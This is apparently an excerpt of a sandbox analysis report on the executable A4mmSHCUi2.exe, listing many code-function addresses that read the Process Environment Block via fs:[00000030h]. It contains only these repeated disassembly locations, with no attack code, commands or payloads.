Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E3DB mov eax, dword ptr fs:[00000030h]	5_2_01C5E3DB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E3DB mov eax, dword ptr fs:[00000030h]	5_2_01C5E3DB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E3DB mov ecx, dword ptr fs:[00000030h]	5_2_01C5E3DB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5E3DB mov eax, dword ptr fs:[00000030h]	5_2_01C5E3DB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8397 mov eax, dword ptr fs:[00000030h]	5_2_01BA8397
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8397 mov eax, dword ptr fs:[00000030h]	5_2_01BA8397
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA8397 mov eax, dword ptr fs:[00000030h]	5_2_01BA8397
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD438F mov eax, dword ptr fs:[00000030h]	5_2_01BD438F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD438F mov eax, dword ptr fs:[00000030h]	5_2_01BD438F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE388 mov eax, dword ptr fs:[00000030h]	5_2_01BAE388
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE388 mov eax, dword ptr fs:[00000030h]	5_2_01BAE388
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE388 mov eax, dword ptr fs:[00000030h]	5_2_01BAE388
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE63FF mov eax, dword ptr fs:[00000030h]	5_2_01BE63FF
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_01BCE3F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_01BCE3F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BCE3F0 mov eax, dword ptr fs:[00000030h]	5_2_01BCE3F0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC03E9 mov eax, dword ptr fs:[00000030h]	5_2_01BC03E9
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA3C0 mov eax, dword ptr fs:[00000030h]	5_2_01BBA3C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_01BB83C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_01BB83C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_01BB83C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB83C0 mov eax, dword ptr fs:[00000030h]	5_2_01BB83C0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C8634F mov eax, dword ptr fs:[00000030h]	5_2_01C8634F
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C32349 mov eax, dword ptr fs:[00000030h]	5_2_01C32349
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C7A352 mov eax, dword ptr fs:[00000030h]	5_2_01C7A352
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C58350 mov ecx, dword ptr fs:[00000030h]	5_2_01C58350
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov eax, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov eax, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov eax, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov ecx, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov eax, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3035C mov eax, dword ptr fs:[00000030h]	5_2_01C3035C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAC310 mov ecx, dword ptr fs:[00000030h]	5_2_01BAC310
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD0310 mov ecx, dword ptr fs:[00000030h]	5_2_01BD0310
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA30B mov eax, dword ptr fs:[00000030h]	5_2_01BEA30B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA30B mov eax, dword ptr fs:[00000030h]	5_2_01BEA30B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA30B mov eax, dword ptr fs:[00000030h]	5_2_01BEA30B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C5437C mov eax, dword ptr fs:[00000030h]	5_2_01C5437C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C88324 mov eax, dword ptr fs:[00000030h]	5_2_01C88324
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C88324 mov ecx, dword ptr fs:[00000030h]	5_2_01C88324
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C88324 mov eax, dword ptr fs:[00000030h]	5_2_01C88324
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C88324 mov eax, dword ptr fs:[00000030h]	5_2_01C88324
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC02A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC02A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC02A0 mov eax, dword ptr fs:[00000030h]	5_2_01BC02A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C862D6 mov eax, dword ptr fs:[00000030h]	5_2_01C862D6
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE284 mov eax, dword ptr fs:[00000030h]	5_2_01BEE284
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE284 mov eax, dword ptr fs:[00000030h]	5_2_01BEE284
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C30283 mov eax, dword ptr fs:[00000030h]	5_2_01C30283
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C30283 mov eax, dword ptr fs:[00000030h]	5_2_01C30283
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C30283 mov eax, dword ptr fs:[00000030h]	5_2_01C30283
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_01BC02E1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_01BC02E1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC02E1 mov eax, dword ptr fs:[00000030h]	5_2_01BC02E1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov eax, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov ecx, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov eax, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov eax, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov eax, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C462A0 mov eax, dword ptr fs:[00000030h]	5_2_01C462A0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_01BBA2C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_01BBA2C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_01BBA2C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_01BBA2C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BBA2C3 mov eax, dword ptr fs:[00000030h]	5_2_01BBA2C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C38243 mov eax, dword ptr fs:[00000030h]	5_2_01C38243
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C38243 mov ecx, dword ptr fs:[00000030h]	5_2_01C38243
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA823B mov eax, dword ptr fs:[00000030h]	5_2_01BA823B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C8625D mov eax, dword ptr fs:[00000030h]	5_2_01C8625D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6A250 mov eax, dword ptr fs:[00000030h]	5_2_01C6A250
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6A250 mov eax, dword ptr fs:[00000030h]	5_2_01C6A250
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C60274 mov eax, dword ptr fs:[00000030h]	5_2_01C60274
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA826B mov eax, dword ptr fs:[00000030h]	5_2_01BA826B
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4260 mov eax, dword ptr fs:[00000030h]	5_2_01BB4260
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4260 mov eax, dword ptr fs:[00000030h]	5_2_01BB4260
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB4260 mov eax, dword ptr fs:[00000030h]	5_2_01BB4260
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB6259 mov eax, dword ptr fs:[00000030h]	5_2_01BB6259
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAA250 mov eax, dword ptr fs:[00000030h]	5_2_01BAA250
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD45B1 mov eax, dword ptr fs:[00000030h]	5_2_01BD45B1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD45B1 mov eax, dword ptr fs:[00000030h]	5_2_01BD45B1
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE59C mov eax, dword ptr fs:[00000030h]	5_2_01BEE59C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE4588 mov eax, dword ptr fs:[00000030h]	5_2_01BE4588
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB2582 mov eax, dword ptr fs:[00000030h]	5_2_01BB2582
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB2582 mov ecx, dword ptr fs:[00000030h]	5_2_01BB2582
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC5ED mov eax, dword ptr fs:[00000030h]	5_2_01BEC5ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEC5ED mov eax, dword ptr fs:[00000030h]	5_2_01BEC5ED
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE5E7 mov eax, dword ptr fs:[00000030h]	5_2_01BDE5E7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB25E0 mov eax, dword ptr fs:[00000030h]	5_2_01BB25E0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C305A7 mov eax, dword ptr fs:[00000030h]	5_2_01C305A7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C305A7 mov eax, dword ptr fs:[00000030h]	5_2_01C305A7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C305A7 mov eax, dword ptr fs:[00000030h]	5_2_01C305A7
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB65D0 mov eax, dword ptr fs:[00000030h]	5_2_01BB65D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA5D0 mov eax, dword ptr fs:[00000030h]	5_2_01BEA5D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEA5D0 mov eax, dword ptr fs:[00000030h]	5_2_01BEA5D0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE5CF mov eax, dword ptr fs:[00000030h]	5_2_01BEE5CF
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE5CF mov eax, dword ptr fs:[00000030h]	5_2_01BEE5CF
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE53E mov eax, dword ptr fs:[00000030h]	5_2_01BDE53E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE53E mov eax, dword ptr fs:[00000030h]	5_2_01BDE53E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE53E mov eax, dword ptr fs:[00000030h]	5_2_01BDE53E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE53E mov eax, dword ptr fs:[00000030h]	5_2_01BDE53E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDE53E mov eax, dword ptr fs:[00000030h]	5_2_01BDE53E
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BC0535 mov eax, dword ptr fs:[00000030h]	5_2_01BC0535
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C46500 mov eax, dword ptr fs:[00000030h]	5_2_01C46500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C84500 mov eax, dword ptr fs:[00000030h]	5_2_01C84500
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE656A mov eax, dword ptr fs:[00000030h]	5_2_01BE656A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE656A mov eax, dword ptr fs:[00000030h]	5_2_01BE656A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE656A mov eax, dword ptr fs:[00000030h]	5_2_01BE656A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8550 mov eax, dword ptr fs:[00000030h]	5_2_01BB8550
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB8550 mov eax, dword ptr fs:[00000030h]	5_2_01BB8550
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE44B0 mov ecx, dword ptr fs:[00000030h]	5_2_01BE44B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB64AB mov eax, dword ptr fs:[00000030h]	5_2_01BB64AB
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6A49A mov eax, dword ptr fs:[00000030h]	5_2_01C6A49A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB04E5 mov ecx, dword ptr fs:[00000030h]	5_2_01BB04E5
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3A4B0 mov eax, dword ptr fs:[00000030h]	5_2_01C3A4B0
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C6A456 mov eax, dword ptr fs:[00000030h]	5_2_01C6A456
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE420 mov eax, dword ptr fs:[00000030h]	5_2_01BAE420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE420 mov eax, dword ptr fs:[00000030h]	5_2_01BAE420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAE420 mov eax, dword ptr fs:[00000030h]	5_2_01BAE420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BAC427 mov eax, dword ptr fs:[00000030h]	5_2_01BAC427
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C3C460 mov ecx, dword ptr fs:[00000030h]	5_2_01C3C460
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE8402 mov eax, dword ptr fs:[00000030h]	5_2_01BE8402
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE8402 mov eax, dword ptr fs:[00000030h]	5_2_01BE8402
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BE8402 mov eax, dword ptr fs:[00000030h]	5_2_01BE8402
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDA470 mov eax, dword ptr fs:[00000030h]	5_2_01BDA470
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDA470 mov eax, dword ptr fs:[00000030h]	5_2_01BDA470
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BDA470 mov eax, dword ptr fs:[00000030h]	5_2_01BDA470
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C36420 mov eax, dword ptr fs:[00000030h]	5_2_01C36420
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BA645D mov eax, dword ptr fs:[00000030h]	5_2_01BA645D
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BD245A mov eax, dword ptr fs:[00000030h]	5_2_01BD245A
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BEE443 mov eax, dword ptr fs:[00000030h]	5_2_01BEE443
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01C307C3 mov eax, dword ptr fs:[00000030h]	5_2_01C307C3
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 5_2_01BB07AF mov eax, dword ptr fs:[00000030h]	5_2_01BB07AF
